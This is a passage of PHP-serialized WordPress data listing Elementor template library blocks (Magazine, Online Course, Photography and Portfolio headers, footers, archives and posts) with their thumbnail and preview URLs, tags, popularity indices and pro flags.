Search\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/01/Search_s.png\";s:12:\"tmpl_created\";i:1579060722;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/magazine-search/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:227;s:16:\"popularity_index\";i:396;s:11:\"trend_index\";i:509;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:653;a:16:{s:4:\"tmpl\";i:944;s:2:\"id\";i:12688;s:5:\"title\";s:30:\"Magazine &#8211; Single Post 1\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/01/Post2_s.png\";s:12:\"tmpl_created\";i:1579060692;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/magazine-single-post-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:228;s:16:\"popularity_index\";i:342;s:11:\"trend_index\";i:175;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:654;a:16:{s:4:\"tmpl\";i:943;s:2:\"id\";i:12699;s:5:\"title\";s:30:\"Magazine &#8211; Single Post 2\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/01/Post3_s.png\";s:12:\"tmpl_created\";i:1579060680;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/magazine-single-post-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:229;s:16:\"popularity_index\";i:348;s:11:\"trend_index\";i:129;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:655;a:16:{s:4:\"tmpl\";i:942;s:2:\"id\";i:12707;s:5:\"title\";s:30:\"Magazine &#8211; Single Post 3\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/01/Post1_s.png\";s:12:\"tmpl_created\";i:1579060669;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/magazine-single-post-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:230;s:16:\"popularity_index\";i:476;s:11:\"trend_index\";i:246;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:656;a:16:{s:4:\"tmpl\";i:941;s:2:\"id\";i:12716;s:5:\"title\";s:30:\"Magazine &#8211; Single Post 3\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/01/Post4_s.png\";s:12:\"tmpl_created\";i:1579060659;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/blocks/magazine-single-post-3-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:231;s:16:\"popularity_index\";i:513;s:11:\"trend_index\";i:489;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:657;a:16:{s:4:\"tmpl\";i:948;s:2:\"id\";i:12652;s:5:\"title\";s:17:\"Magazine- Archiv2\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/01/Archiv2_s.png\";s:12:\"tmpl_created\";i:1579060730;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/magazine-archiv2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:232;s:16:\"popularity_index\";i:525;s:11:\"trend_index\";i:585;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:658;a:16:{s:4:\"tmpl\";i:990;s:2:\"id\";i:13361;s:5:\"title\";s:25:\"Online Course &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/04/404.jpg\";s:12:\"tmpl_created\";i:1587474710;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/online-course-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:35:\"[\"404\",\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:233;s:16:\"popularity_index\";i:682;s:11:\"trend_index\";i:498;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:659;a:16:{s:4:\"tmpl\";i:987;s:2:\"id\";i:13387;s:5:\"title\";s:32:\"Online Course &#8211; End Lesson\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/04/Lesson-End-.jpg\";s:12:\"tmpl_created\";i:1587474682;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/blocks/online-course-end-lesson/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:234;s:16:\"popularity_index\";i:653;s:11:\"trend_index\";i:408;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:660;a:16:{s:4:\"tmpl\";i:989;s:2:\"id\";i:13369;s:5:\"title\";s:28:\"Online Course &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/04/Footer.jpg\";s:12:\"tmpl_created\";i:1587474701;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/blocks/online-course-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:38:\"[\"Course Online\",\"Education\",\"Footer\"]\";s:10:\"menu_order\";i:235;s:16:\"popularity_index\";i:389;s:11:\"trend_index\";i:308;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:661;a:16:{s:4:\"tmpl\";i:988;s:2:\"id\";i:13378;s:5:\"title\";s:28:\"Online Course &#8211; Header\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-education-online-courses.jpg\";s:12:\"tmpl_created\";i:1587474693;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/blocks/online-course-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:38:\"[\"Course Online\",\"Education\",\"Header\"]\";s:10:\"menu_order\";i:236;s:16:\"popularity_index\";i:492;s:11:\"trend_index\";i:519;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:662;a:16:{s:4:\"tmpl\";i:986;s:2:\"id\";i:13395;s:5:\"title\";s:34:\"Online Course &#8211; Start Lesson\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/04/Lesson-Start.jpg\";s:12:\"tmpl_created\";i:1587474673;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/blocks/online-course-start-lesson/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:237;s:16:\"popularity_index\";i:672;s:11:\"trend_index\";i:578;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:663;a:16:{s:4:\"tmpl\";i:953;s:2:\"id\";i:13089;s:5:\"title\";s:23:\"Photography &#8211; 404\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/02/404_s.png\";s:12:\"tmpl_created\";i:1582091623;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/photography-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:33:\"[\"404\",\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:238;s:16:\"popularity_index\";i:702;s:11:\"trend_index\";i:706;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:664;a:16:{s:4:\"tmpl\";i:954;s:2:\"id\";i:13096;s:5:\"title\";s:32:\"Photography &#8211; Archiv Media\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/02/Archiv_s.png\";s:12:\"tmpl_created\";i:1582091742;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/blocks/photography-archiv-media/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:27:\"[\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:239;s:16:\"popularity_index\";i:631;s:11:\"trend_index\";i:405;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:665;a:16:{s:4:\"tmpl\";i:955;s:2:\"id\";i:13103;s:5:\"title\";s:26:\"Photography &#8211; Footer\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/02/Footer_s.png\";s:12:\"tmpl_created\";i:1582091903;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/photography-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:36:\"[\"Footer\",\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:240;s:16:\"popularity_index\";i:422;s:11:\"trend_index\";i:230;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:666;a:16:{s:4:\"tmpl\";i:957;s:2:\"id\";i:13112;s:5:\"title\";s:26:\"Photography &#8211; Header\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-photography-portfolio.png\";s:12:\"tmpl_created\";i:1582092483;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/photography-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:36:\"[\"Header\",\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:241;s:16:\"popularity_index\";i:325;s:11:\"trend_index\";i:205;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:667;a:16:{s:4:\"tmpl\";i:956;s:2:\"id\";i:13120;s:5:\"title\";s:31:\"Photography &#8211; Single Post\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/02/Post_s.png\";s:12:\"tmpl_created\";i:1582092351;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/blocks/photography-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:27:\"[\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:242;s:16:\"popularity_index\";i:671;s:11:\"trend_index\";i:645;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:668;a:16:{s:4:\"tmpl\";i:901;s:2:\"id\";i:11807;s:5:\"title\";s:9:\"Portfolio\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/09/404_small.png\";s:12:\"tmpl_created\";i:1569430070;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/portfolio-20/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:40:\"[\"404\",\"Creative Portfolio\",\"Portfolio\"]\";s:10:\"menu_order\";i:243;s:16:\"popularity_index\";i:480;s:11:\"trend_index\";i:497;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:669;a:16:{s:4:\"tmpl\";i:900;s:2:\"id\";i:11832;s:5:\"title\";s:9:\"Portfolio\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/09/Footer_small.png\";s:12:\"tmpl_created\";i:1569430019;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/portfolio-19/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:43:\"[\"Creative Portfolio\",\"Footer\",\"Portfolio\"]\";s:10:\"menu_order\";i:244;s:16:\"popularity_index\";i:246;s:11:\"trend_index\";i:102;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:670;a:16:{s:4:\"tmpl\";i:898;s:2:\"id\";i:11847;s:5:\"title\";s:9:\"Portfolio\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/09/Archiv_small.png\";s:12:\"tmpl_created\";i:1569430010;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/portfolio-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:34:\"[\"Creative Portfolio\",\"Portfolio\"]\";s:10:\"menu_order\";i:245;s:16:\"popularity_index\";i:336;s:11:\"trend_index\";i:455;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:671;a:16:{s:4:\"tmpl\";i:897;s:2:\"id\";i:11854;s:5:\"title\";s:9:\"Portfolio\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/09/Post_small.png\";s:12:\"tmpl_created\";i:1569429983;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:34:\"[\"Creative Portfolio\",\"Portfolio\"]\";s:10:\"menu_order\";i:246;s:16:\"popularity_index\";i:482;s:11:\"trend_index\";i:609;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:672;a:16:{s:4:\"tmpl\";i:904;s:2:\"id\";i:11890;s:5:\"title\";s:9:\"Portfolio\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-design-portfolio.png\";s:12:\"tmpl_created\";i:1571907344;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/portfolio-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:43:\"[\"Creative Portfolio\",\"Header\",\"Portfolio\"]\";s:10:\"menu_order\";i:247;s:16:\"popularity_index\";i:306;s:11:\"trend_index\";i:364;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:673;a:16:{s:4:\"tmpl\";i:896;s:2:\"id\";i:11861;s:5:\"title\";s:27:\"Portfolio &#8211; Project 1\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/09/Project1_small.png\";s:12:\"tmpl_created\";i:1569429975;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/portfolio-project-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:34:\"[\"Creative Portfolio\",\"Portfolio\"]\";s:10:\"menu_order\";i:248;s:16:\"popularity_index\";i:643;s:11:\"trend_index\";i:764;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:674;a:16:{s:4:\"tmpl\";i:895;s:2:\"id\";i:11870;s:5:\"title\";s:27:\"Portfolio &#8211; Project 2\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/09/Project2_small.png\";s:12:\"tmpl_created\";i:1569429964;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/portfolio-project-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:34:\"[\"Creative Portfolio\",\"Portfolio\"]\";s:10:\"menu_order\";i:249;s:16:\"popularity_index\";i:662;s:11:\"trend_index\";i:816;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:675;a:16:{s:4:\"tmpl\";i:903;s:2:\"id\";i:11897;s:5:\"title\";s:27:\"Portfolio &#8211; Project 2\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/09/Project2_small.png\";s:12:\"tmpl_created\";i:1569494236;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/blocks/portfolio-project-2-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:34:\"[\"Creative Portfolio\",\"Portfolio\"]\";s:10:\"menu_order\";i:250;s:16:\"popularity_index\";i:733;s:11:\"trend_index\";i:744;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:676;a:16:{s:4:\"tmpl\";i:894;s:2:\"id\";i:11877;s:5:\"title\";s:27:\"Portfolio &#8211; Project 3\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/09/Project3_small.png\";s:12:\"tmpl_created\";i:1569429954;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/portfolio-project-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:34:\"[\"Creative Portfolio\",\"Portfolio\"]\";s:10:\"menu_order\";i:251;s:16:\"popularity_index\";i:692;s:11:\"trend_index\";i:0;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:677;a:16:{s:4:\"tmpl\";i:597;s:2:\"id\";i:5019;s:5:\"title\";s:11:\"Portfolio 1\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_black_1.png\";s:12:\"tmpl_created\";i:1520520580;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/portfolio-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"Portfolio\"]\";s:10:\"menu_order\";i:252;s:16:\"popularity_index\";i:170;s:11:\"trend_index\";i:236;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:678;a:16:{s:4:\"tmpl\";i:609;s:2:\"id\";i:5141;s:5:\"title\";s:12:\"Portfolio 10\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_white_10.png\";s:12:\"tmpl_created\";i:1520520601;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/portfolio-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"Portfolio\"]\";s:10:\"menu_order\";i:253;s:16:\"popularity_index\";i:416;s:11:\"trend_index\";i:478;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:679;a:16:{s:4:\"tmpl\";i:598;s:2:\"id\";i:5027;s:5:\"title\";s:12:\"Portfolio 11\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_white_2.png\";s:12:\"tmpl_created\";i:1520520581;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/portfolio-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"Portfolio\"]\";s:10:\"menu_order\";i:254;s:16:\"popularity_index\";i:304;s:11:\"trend_index\";i:421;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:680;a:16:{s:4:\"tmpl\";i:599;s:2:\"id\";i:5037;s:5:\"title\";s:12:\"Portfolio 12\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_white_3.png\";s:12:\"tmpl_created\";i:1520520583;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/portfolio-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"Portfolio\"]\";s:10:\"menu_order\";i:255;s:16:\"popularity_index\";i:279;s:11:\"trend_index\";i:399;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:681;a:16:{s:4:\"tmpl\";i:600;s:2:\"id\";i:5057;s:5:\"title\";s:12:\"Portfolio 13\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_white_4.png\";s:12:\"tmpl_created\";i:1520520586;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/portfolio-13/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"Portfolio\"]\";s:10:\"menu_order\";i:256;s:16:\"popularity_index\";i:239;s:11:\"trend_index\";i:288;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:682;a:16:{s:4:\"tmpl\";i:601;s:2:\"id\";i:5071;s:5:\"title\";s:12:\"Portfolio 14\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_white_5.png\";s:12:\"tmpl_created\";i:1520520588;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/portfolio-14/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"Portfolio\"]\";s:10:\"menu_order\";i:257;s:16:\"popularity_index\";i:276;s:11:\"trend_index\";i:329;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:683;a:16:{s:4:\"tmpl\";i:603;s:2:\"id\";i:5090;s:5:\"title\";s:12:\"Portfolio 15\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_white_6.png\";s:12:\"tmpl_created\";i:1520520591;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/portfolio-15/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"Portfolio\"]\";s:10:\"menu_order\";i:258;s:16:\"popularity_index\";i:186;s:11:\"trend_index\";i:283;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:684;a:16:{s:4:\"tmpl\";i:604;s:2:\"id\";i:5098;s:5:\"title\";s:12:\"Portfolio 16\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_white_7.png\";s:12:\"tmpl_created\";i:1520520593;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/portfolio-16/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"Portfolio\"]\";s:10:\"menu_order\";i:259;s:16:\"popularity_index\";i:156;s:11:\"trend_index\";i:211;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:685;a:16:{s:4:\"tmpl\";i:606;s:2:\"id\";i:5115;s:5:\"title\";s:12:\"Portfolio 17\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_white_8.png\";s:12:\"tmpl_created\";i:1520520596;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/portfolio-17/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"Portfolio\"]\";s:10:\"menu_order\";i:260;s:16:\"popularity_index\";i:19;s:11:\"trend_index\";i:22;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:686;a:16:{s:4:\"tmpl\";i:608;s:2:\"id\";i:5133;s:5:\"title\";s:12:\"Portfolio 18\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_white_9.png\";s:12:\"tmpl_created\";i:1520520599;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/portfolio-18/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"Portfolio\"]\";s:10:\"menu_order\";i:261;s:16:\"popularity_index\";i:180;s:11:\"trend_index\";i:280;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:687;a:16:{s:4:\"tmpl\";i:610;s:2:\"id\";i:5149;s:5:\"title\";s:11:\"Portfolio 2\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_black_10.png\";s:12:\"tmpl_created\";i:1520520602;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/portfolio-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"Portfolio\"]\";s:10:\"menu_order\";i:262;s:16:\"popularity_index\";i:413;s:11:\"trend_index\";i:635;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:688;a:16:{s:4:\"tmpl\";i:468;s:2:\"id\";i:5045;s:5:\"title\";s:11:\"Portfolio 